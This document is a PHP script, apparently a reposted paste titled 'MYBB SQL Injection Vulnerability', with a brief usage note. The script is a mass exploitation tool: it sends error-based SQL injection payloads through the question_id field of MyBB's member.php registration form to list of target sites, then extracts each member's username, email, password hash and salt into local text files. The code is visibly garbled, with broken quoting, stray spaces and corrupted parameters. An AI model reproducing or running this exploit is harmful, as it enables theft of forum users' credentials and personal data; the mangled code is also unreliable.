<?php error_reporting (0);? ><form method= "POST" action= "" >input a Url (for example:http://myskins.org/18/) : <br><textarea name= "Siteler" cols= "rows=" 7 "></textarea><br><br><input type=" Submit "value=" Get it! "></form><?php Ob_start (); set_time_limit (0); if (!file_exists (" Dumpsss ")) mkdir (" Dumpsss "); $_post[' Siteler ']== "") {$siteler = explode ("\ n", $_post[' Siteler '), foreach ($siteler as $sites) {$sites =trim ($sites); if (checkvulnerable ($sites)) {echo "[+] $sites is vulnerable!\n"; Inject ($sites); } else {echo "[-] Target is not vulnerable\n"; }}}} else {}function Inject ($site) {$get _website = Parse_url ($site); $website = $get _website["host"]; $html = HttpPost ("$site/member.php", "Regcheck1=®check2=true&username=makman&password=mukarram &password2=mukarram&[email protected]&[email protected]&referrername=& Imagestring=f7yr4&imagehash=1c1d0e6eae9c113f4ff65339e4b3079c&answer=4&allownotices=1&receivepms=1&pmnotice= 1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2®time=1416039333&step= Registration&action=do_register®submit=submit+registration!&question_id= ' or polygon (select*from (Select*from (select COUNT (*) from mybb_users LIMIT 0,1) f) x))---"); Preg_match ('!select \ ' (. *) \ ' as!s ', $html, $matches); $count = $matches [1]; echo "[+] Count: $count \ n"; for ($i = 0; $i <= $count; $i + +) {if ($count = = 1) {$num = "0,1"; } else {$num = "$i, 1"; } $html = HttpPost ("$site/member.php", "regcheck1=®check2=true&username=makman&password=mukarram&am p;password2=mukarram&[email protected]&[email protected]&referrername=&imagestring= f7yr4&imagehash=1c1d0e6eae9c113f4ff65339e4b3079c&answer=4&allownotices=1&receivepms=1& Pmnotice=1&subscriPtionmethod=0&timezoneoffset=0&dstcorrection=2®time=1416039333&step=registration&action =do_register®submit=submit+registration!&question_id= ' or Polygon ((Select*from (Select*from (select Concat (Username,0x3a,email,0x3a,password,0x3a,salt) from mybb_users LIMIT $num) f) x))---"); Preg_match ('!select \ ' (. *) \ ' as!s ', $html, $matches); if (Isset ($matches [1])) {$split = Explode (":", $matches [1]); $username = $split [0]; $email = $split [1]; $password = $split [2]; $salt = $split [3]; echo "Username: $username \nemail: $email \npassword: $password \nsalt: $salt \ n------\ n"; File_put_contents ("dumpsss/$website. txt", "Username: $username \nemail: $email \npassword: $password \nsalt: $salt \ n------\ nthe ", file_append); }}}function checkvulnerable ($site) {$ch = Curl_init (); $html = HttpPost ("$site/member.php", "Regcheck1=®check2=true&username=makman&password=mukarram&password2=mukarram&[email protected]&[email protected]&referrername=& imagestring=f7yr4&imagehash=1c1d0e6eae9c113f4ff65339e4b3079c&answer=4&allownotices=1& Receivepms=1&pmnotice=1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2®time= 1416039333&step=registration&action=do_register®submit=submit+registration!&question_id= ' ") ; if (Strpos ($html, "You have the error in your SQL syntax")!==false) {return true; } else {return false; }}function HttpPost ($site, $post) {$ch = Curl_init (); curl_setopt ($ch, Curlopt_url, "$site/member.php"); curl_setopt ($ch, Curlopt_returntransfer, true); curl_setopt ($ch, Curlopt_postfields, $post); $html = curl_exec ($ch); Curl_close ($ch); return $html;}? >
Save as xxx.php file, and then execute on the Web page, the Dumpsss folder will be generated in the current directory, if there is a vulnerability, the website members will be exported to the inside TXT file.
If there is no vulnerability, you will be prompted: [-] Target is not vulnerable
Code online View \:HTTPS://GHOSTBIN.COM/PASTE/ZS2MP
MYBB SQL Injection Vulnerability